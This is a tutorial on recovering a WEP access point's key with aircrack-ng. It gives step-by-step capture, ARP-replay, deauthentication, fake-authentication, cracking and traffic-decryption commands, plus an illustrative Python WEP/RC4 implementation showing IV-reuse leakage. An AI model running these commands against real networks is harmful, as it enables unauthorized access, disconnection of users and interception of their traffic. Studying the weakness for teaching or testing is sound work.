WEP Cracking
These steps recover the WEP key of an access point (AP) that is still using WEP, using the aircrack-ng suite. Run them in this order; <IFACE> must already be in monitor mode.
Start capturing packets first (airodump-ng writes the capture to <CAPTUREFILE>-01.cap; the IVs it collects are what aircrack-ng needs):
sudo airodump-ng --bssid <APMAC> -w <CAPTUREFILE> --channel <CHANNELNUM> <IFACE>
Start the ARP request replay, sourcing frames from an associated client so the AP answers each replay with a freshly encrypted packet (a new IV):
sudo aireplay-ng --arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>
Send deauth packets to that client; when it reconnects it usually emits an ARP request, which seeds the replay above:
sudo aireplay-ng --deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>
If you inject with your own card's MAC instead of an associated client's (for example when no client is present), fake-authenticate that MAC to the AP first, otherwise the AP discards your injected frames. Here -h is the MAC your card injects with, not a real client's, and 5 is the re-association delay in seconds:
sudo aireplay-ng --fakeauth 5 -e <ESSID> -a <APMAC> -h <IFACEMAC> <IFACE>
Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>-01.cap
-n is the key length in bits (64 or 128). The fudge factor -f controls how far the KoreK statistical attack brute-forces beyond the most-voted byte value at each key position: the default is 2, and a higher value tries more candidate bytes, which takes longer but can make the difference between recovering the key and failing when the IV count is low. (The default PTW attack in current aircrack-ng instead needs a large number of ARP-derived IVs, which is why the ARP replay step matters.)
Sometimes the AP has no clients connected, so there is nothing to deauth or replay. In that case follow the aircrack-ng guide:
How to crack WEP with no clients.
Once the WEP key is known, use airdecap-ng to decrypt the capture (the key is given in hex). It writes the decrypted frames to <PCAPFILE>-dec.cap next to the input, which tcpdump can read directly:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap
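To make clear what the IVs in the capture are and what airdecap-ng is doing with the recovered key, here is an added example (not code from the original page or from the aircrack-ng project) that implements WEP's per-frame encryption in pure Python: the 24-bit IV is prepended to the shared key to seed RC4, and a CRC-32 ICV is appended to the plaintext before encryption. The key, IV and payloads are constructed for illustration. The last function shows why IV reuse is fatal: two frames encrypted under the same IV share a keystream, so XORing their ciphertexts yields the XOR of their plaintexts, no key required.

```python
import struct
import zlib
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Build a WEP frame body: IV (3 bytes) | key-id byte | RC4(IV||key, plaintext||ICV)."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV and a 40-bit or 104-bit key")
    ciphertext = rc4(iv + key, plaintext + icv(plaintext))
    return iv + bytes([(key_id & 0x3) << 6]) + ciphertext


def wep_decrypt(key: bytes, body: bytes) -> Optional[bytes]:
    """Decrypt a WEP body like airdecap-ng would; None if the ICV does not verify."""
    iv, ciphertext = body[:3], body[4:]
    decrypted = rc4(iv + key, ciphertext)
    plaintext, tag = decrypted[:-4], decrypted[-4:]
    if icv(plaintext) != tag:
        return None
    return plaintext


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(body_a: bytes, body_b: bytes) -> Optional[bytes]:
    """If two bodies reuse an IV (and hence a keystream), return the XOR of
    their plaintext||ICV fields, recoverable with no knowledge of the key."""
    if body_a[:3] != body_b[:3]:
        return None
    return xor_bytes(body_a[4:], body_b[4:])


# Constructed sample inputs (not captured traffic).
KEY = bytes.fromhex("0123456789")  # 40-bit WEP key
IV = bytes.fromhex("a1b2c3")
PLAINTEXT_A = b"GET /index.html"
PLAINTEXT_B = b"POST /login.php"


def demo() -> dict:
    body_a = wep_encrypt(KEY, IV, PLAINTEXT_A)
    body_b = wep_encrypt(KEY, IV, PLAINTEXT_B)  # same IV: keystream reuse
    return {
        "decrypted": wep_decrypt(KEY, body_a),
        "wrong_key": wep_decrypt(bytes.fromhex("0000000000"), body_a),
        "leak_matches_plaintext_xor": keystream_reuse_leak(body_a, body_b)
        == xor_bytes(PLAINTEXT_A + icv(PLAINTEXT_A), PLAINTEXT_B + icv(PLAINTEXT_B)),
    }


if __name__ == "__main__":
    print(demo())
```

With only 2^24 possible IVs and most drivers counting up from zero or picking at random, collisions arrive quickly on a busy AP; the ARP replay step above deliberately forces the AP to burn through IVs so aircrack-ng has enough to work with.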